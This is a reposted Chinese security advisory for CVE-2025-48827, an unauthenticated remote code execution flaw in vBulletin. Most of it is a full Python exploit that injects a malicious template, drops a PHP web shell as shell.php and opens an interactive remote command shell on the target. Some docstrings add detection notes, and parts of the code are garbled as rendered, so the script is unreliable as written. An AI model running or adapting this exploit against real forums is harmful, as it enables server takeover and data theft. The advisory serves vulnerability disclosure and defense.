0x00 前言
vBulletin 是一款功能强大、灵活且可完全按需定制的商业论坛程序(非开源),使用 PHP 脚本语言编写,并基于以高效、高速著称的数据库引擎 MySQL。
0x01 漏洞描述
未经授权即可调用受保护的 API 控制器 replaceAdTemplate 执行本应受限的操作,进而执行任意代码。
0x02 CVE编号
CVE-2025-48827
0x03 影响版本
5.0.0 <= vBulletin < 5.7.6
6.0.0 <= vBulletin < 6.0.4
0x04 漏洞详情
POC:
https://github.com/0xgh057r3c0n/CVE-2025-48827
#!/usr/bin/env python3
import requests
import sys
import urllib3
import re
# Suppress InsecureRequestWarning
# Silences urllib3's certificate warning; every request below also passes
# verify=False, so TLS certificate errors are never surfaced to the user.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ANSI Colors
# NOTE(review): the "�33[" prefixes look like a rendering artifact of an
# ESC-sequence escape on this page; they are left exactly as shown. The same
# page artifact appears to have stripped the backslash from several "n"
# newline escapes in the strings further down.
RED = "�33[31m"
GREEN = "�33[32m"
YELLOW = "�33[33m"
BLUE = "�33[34m"
CYAN = "�33[36m"
BOLD = "�33[1m"
RESET = "�33[0m"
def banner():
"""Print the tool's ASCII-art banner in cyan/bold.

Takes no arguments and returns None. The art below is shown garbled on this
page (trailing ">" characters look like a line-wrapping artifact).
"""
print(CYAN + BOLD + r"""
__________ .__ .__ __ .__ ___________________ _______>
___ _______ __ __| | | | _____/ |_|__| __________ _ ___ \_ __>
/ /| | _/ | | | | _/ __ __ |/ | _/ / | _>
/ | | | / |_| |_ ___/| | | | | | ____| >
_/ |______ /____/|____/____/___ >__| |__|___| /____|_ /______ /______>
/ / / / / >
vBulletin RCE - Web Shell Dropper by 0xgh057r3c0n
""" + RESET)
def usage(script):
"""Print usage text for ``script`` (the argv[0] name) and exit with status 1.

Never returns: sys.exit(1) is called unconditionally.
"""
print(YELLOW + f"nUsage: python3 {script} <URL>")
print(f"Example: python3 {script} http://target/vb/n" + RESET)
sys.exit(1)
def error_exit(msg):
"""Print ``msg`` as a red "[-] Error:" line and exit with status 1.

Never returns; used by the request functions below as their failure path.
"""
print(RED + f"[-] Error: {msg}n" + RESET)
sys.exit(1)
def info(msg):
"""Print ``msg`` as a yellow "[!]" status line. Returns None."""
print(YELLOW + f"[!] {msg}" + RESET)
def success(msg):
"""Print ``msg`` as a green "[+]" status line. Returns None."""
print(GREEN + f"[+] {msg}" + RESET)
def inject_rce_template(session, target):
"""Send the replaceAdTemplate request that stores an attacker-controlled template.

session: requests.Session shared by every request in this script.
target: base URL ending in "/" (normalized in main()).
Returns None; calls error_exit() (process exit) when the response body is not
the literal string ``null``.

Defender notes: this is the first request of the chain and the clearest
detection point -- a POST whose ``routestring`` is
``ajax/api/ad/replaceAdTemplate`` and whose ``template`` field contains a
``<vb:if condition=...>`` tag. main() performs no login before calling this,
which matches the unauthorized-access description earlier on the page. The
mitigation is running a version outside the affected ranges listed above
(>= 5.7.6 / >= 6.0.4).
"""
inject_data = {
"routestring": "ajax/api/ad/replaceAdTemplate",
"styleid": "1",
"location": "rce",
# NOTE(review): the quoting of this value does not parse as Python as
# rendered on this page; it is left exactly as shown.
"template": '<vb:if condition='"passthru"($_POST["cmd"])'> </vb:if>'
}
# verify=False: TLS certificate validation is skipped for this request.
r = session.post(target, data=inject_data, verify=False)
# The only success signal the script relies on is a bare "null" response body.
if r.text.strip() != "null":
error_exit("Template injection failed.")
success("RCE payload injected.")
def drop_shell(session, target):
"""Write a PHP web shell to ``shell.php`` through the previously injected template.

session: requests.Session shared by every request in this script.
target: base URL ending in "/".
Returns None. The HTTP response is not inspected, so the success() message is
printed whether or not the file was actually written.

Defender notes: the on-disk artifact is a new ``shell.php`` which the script
assumes is reachable at ``{target}shell.php``; follow-up access is a GET with a
``cmd`` query parameter. Either is an indicator of a completed compromise, and
the rendered request (``routestring`` = ``ajax/render/ad_rce``) is the second
request of the chain to alert on.
"""
shell_code = '<?php if(isset($_GET["cmd"])){echo "<pre>"; system($_GET["cmd"]); echo "</pre>";} ?>'
# !r wraps the PHP source in Python repr quotes so it survives as one shell word.
cmd = f"echo {shell_code!r} > shell.php"
drop_data = {
"routestring": "ajax/render/ad_rce",
"styleid": "1",
"location": "rce",
"cmd": cmd
}
session.post(target, data=drop_data, verify=False)
success(f"shell.php dropped at: {target}shell.php")
info("Launch commands like:")
print(f" curl '{target}shell.php?cmd=whoami'n")
def run_command(session, target, cmd):
"""POST ``cmd`` to the ad_rce render route and return the text between <pre> tags.

session: requests.Session shared by every request in this script.
target: base URL ending in "/".
cmd: shell command string placed in the ``cmd`` form field.
Returns the stripped contents of the first ``<pre>...</pre>`` in the response
(re.DOTALL, so it may span lines), or None when the status is not 200 or no
<pre> block is found. Always prints the full response body first.
"""
data = {
"routestring": "ajax/render/ad_rce",
"styleid": "1",
"location": "rce",
"cmd": cmd
}
r = session.post(target, data=data, verify=False)
if r.status_code != 200:
print(RED + f"[-] HTTP error: {r.status_code}" + RESET)
return None
# Always show full response for debug
print(YELLOW + "[DEBUG] Full response:n" + RESET + r.text)
# Non-greedy match on the first <pre> block; DOTALL lets it cross newlines.
match = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)
if match:
return match.group(1).strip()
else:
return None
def interactive_shell(session, target):
"""Read-eval loop that forwards each typed line through run_command().

session: requests.Session shared by every request in this script.
target: base URL ending in "/".
Returns None when the user types ``exit`` or sends Ctrl-C / EOF.

Because every request is stateless, the working directory is tracked here on
the client side: ``cd <path>`` is executed as ``cd {cwd} && cd {path} && pwd``
and the printed path becomes the new ``cwd``; every other command is prefixed
with ``cd {cwd} &&``. An empty or falsy output is reported as a failure.
"""
cwd = "."
info("Entering interactive mode (type 'exit' to quit)")
while True:
try:
user_input = input(f"{BOLD}{BLUE}(shell:{cwd})$ {RESET}").strip()
except (KeyboardInterrupt, EOFError):
print("n" + YELLOW + "[!] Exiting interactive shell." + RESET)
break
if user_input.lower() == "exit":
break
if user_input.startswith("cd "):
path = user_input[3:].strip()
# Resolve the new directory remotely and keep only the pwd output.
cmd = f"cd {cwd} && cd {path} && pwd"
output = run_command(session, target, cmd)
if output:
cwd = output
else:
print(RED + "[-] Directory change failed." + RESET)
continue
cmd = f"cd {cwd} && {user_input}"
output = run_command(session, target, cmd)
if output:
print(GREEN + output + RESET)
else:
print(RED + "[-] No output or command failed." + RESET)
def main():
"""Entry point: validate argv, then run the three-step chain.

Expects exactly one argument (the base URL); otherwise usage() exits. The URL
is normalized to end in a single "/". One requests.Session is used for all
three steps (template injection, shell drop, interactive loop); any
RequestException is turned into error_exit(). No authentication is performed
at any point.
"""
banner()
if len(sys.argv) != 2:
usage(sys.argv[0])
target = sys.argv[1].rstrip('/') + '/'
session = requests.Session()
try:
inject_rce_template(session, target)
drop_shell(session, target)
interactive_shell(session, target)
except requests.exceptions.RequestException as e:
error_exit(f"Request error: {e}")
# Script guard: main() runs only when the file is executed directly.
if __name__ == "__main__":
main()
0x05 参考链接
https://kevintel.com/CVE-2025-48827
https://github.com/0xgh057r3c0n/CVE-2025-48827
原文始发于微信公众号(信安百科):CVE-2025-48827|vBulletin远程代码执行漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。